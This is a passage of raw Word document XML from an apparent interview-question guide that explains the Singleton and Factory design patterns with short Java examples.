    <w:p w14:paraId="7C0ADDBF" w14:textId="713F7530" w:rsidR="008D0DCC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008D0DC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7E9D93B">
          <v:rect id="_x0000_i2007" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D988C6" w14:textId="77777777" w:rsidR="00C6064A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C6064A" w:rsidP="00C6064A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="416" w:name="_Toc196307896"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the singleton design pattern? Explain it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="416"/>
    </w:p>
    <w:p w14:paraId="77237585" w14:textId="159C2A05" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Singleton Design Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a class is created and provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global access point</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to that instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26605A8A" w14:textId="77777777" w:rsidR="005E4D47"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130FEA8">
          <v:rect id="_x0000_i2008" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="597E3746" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47"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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1B5BC9" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1830"/>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Private constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents instantiation from other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D0250" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1830"/>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Static instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Holds the one and only instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306E9E2A" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1830"/>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Public static method</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides global access to the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB688B4" w14:textId="77777777" w:rsidR="005E4D47"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A611AD">
          <v:rect id="_x0000_i2009" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA713E4" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B2FC01" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1831"/>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Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747A7499" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1831"/>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Database connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D8014E" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1831"/>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Configuration classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B6BA38" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1831"/>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Thread pools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A12C89D" w14:textId="77777777" w:rsidR="005E4D47"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100FEDA">
          <v:rect id="_x0000_i2010" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA719CF" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47"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Lazy Initialization Example in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E95EDD2"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ublic class Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D16009"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rivate static Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E35CE" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2042CF1E"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 private constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E107CFA"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rivate Singleton() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19975CD0" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED050CE"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 public access method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B8E658"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ublic static Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6869B34E"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if (instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10A28F"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instance = new Singleton(); // create instance if not exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B391F04"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4967B8D7"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return instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2AE886"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28271D0B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9209F5" w14:textId="77777777" w:rsidR="005E4D47"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E3DD0CF">
          <v:rect id="_x0000_i2011" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2094E97A" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47"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Thread-Safe Singleton (with synchronized block):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCDAF56"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ublic class Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC2AB1"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rivate static Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8EA7D5" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC986FF"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rivate Singleton() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CBEC7" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3F9F7A"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ublic static Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D5D43A"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if (instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443B84CB"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synchronized(Singleton.class) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6243C7"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if (instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CEEF93"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instance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC9C2C7"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7642271A"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62E31657"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3CDCF839"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return instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042B7CC6"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E7825"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33F078" w14:textId="77777777" w:rsidR="005E4D47"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4803FFB">
          <v:rect id="_x0000_i2012" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="259CFAF2" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1253D71B" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1832"/>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Controlled access to sole instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356FDB56" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1832"/>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Reduces memory usage (shared instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E3262" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1832"/>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Avoids redundant object creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F9FA9" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47"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Singleton is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>creational pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used when exactly </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one object is needed across the system</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A605F" w14:textId="15546BED" w:rsidR="008D0DCC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008D0DC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086FAE8">
          <v:rect id="_x0000_i2013" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6EF312" w14:textId="50A7B51B" w:rsidR="000D56E3" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5C19">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="417" w:name="_Toc196307897"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Factory design pattern</w:t>
      </w:r>
      <w:r w:rsidR="000D56E3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="417"/>
    </w:p>
    <w:p w14:paraId="79EACBD6" w14:textId="024065BC" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Factory Design Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>creational design pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provides an interface for creating objects but </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lets subclasses decide</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which class to instantiate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9ACCAD"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It promotes </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>loose coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by removing the instantiation logic from the client code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AACD1C" w14:textId="77777777" w:rsidR="008C6494"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6F18E35">
          <v:rect id="_x0000_i2014" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B70DB" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494"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Key Concepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3775588D" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1833"/>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Define an interface or abstract class for creating an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD2EEA4" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1833"/>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Subclasses or a separate factory class decide which class to instantiate based on input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5619E61D" w14:textId="77777777" w:rsidR="008C6494"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BE93B40">
          <v:rect id="_x0000_i2015" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9DCCE3" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C9FEF3"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When the object creation is complex or dependent on conditions, and you don’t want the client to deal with object creation logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A468BFE" w14:textId="77777777" w:rsidR="008C6494"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D9308B3">
          <v:rect id="_x0000_i2016" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F754F56" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494"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Real-life Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02717BB3"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A ShapeFactory creates different Shape objects like Circle, Rectangle, etc., based on input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A33367" w14:textId="77777777" w:rsidR="008C6494"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CC19E02">
          <v:rect id="_x0000_i2017" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF7EB28" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494"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Java Code Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B054E39" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494"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1. Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5596C1BD"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ublic interface Shape {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393521E"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void draw();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C2164D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DE53CD" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494"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2. Implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5941B26B"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ublic class Circle implements Shape {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48668FA2"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ublic void draw() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A10EBF"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System.out.println("Drawing Circle");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF8782"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60BE6310"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB38AE" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14EA12DA"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ublic class Rectangle implements Shape {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E1EC0B"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ublic void draw() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60295157"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System.out.println("Drawing Rectangle");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C224D73"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3B01FC42"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563754C1" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494"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3. Factory Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB55B8"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ublic class ShapeFactory {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D43302"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ublic Shape getShape(String type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB5B249"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if (type == null) return null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44857D33"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if (type.equalsIgnoreCase("CIRCLE")) return new Circle();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5020EFD5"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if (type.equalsIgnoreCase("RECTANGLE")) return new Rectangle();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9DA436"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return null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB15953"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2ABC975A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20071524" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494"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4. Client Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC2B775"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ublic class Main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B04D1E1"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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F47E6D"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ShapeFactory factory = new ShapeFactory();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A305B3" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111E5F4C"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Shape s1 = factory.getShape("CIRCLE");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553AB416"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s1.draw();  // Output: Drawing Circle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481B82CA" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62754E35"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Shape s2 = factory.getShape("RECTANGLE");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49462464"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s2.draw();  // Output: Drawing Rectangle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EEE1B4"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415573E8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C69FF" w14:textId="77777777" w:rsidR="008C6494"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AD78A8B">
          <v:rect id="_x0000_i2018" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8AFF87" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494"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Advantages:</w:t>
      </w:r>
    </w:p>
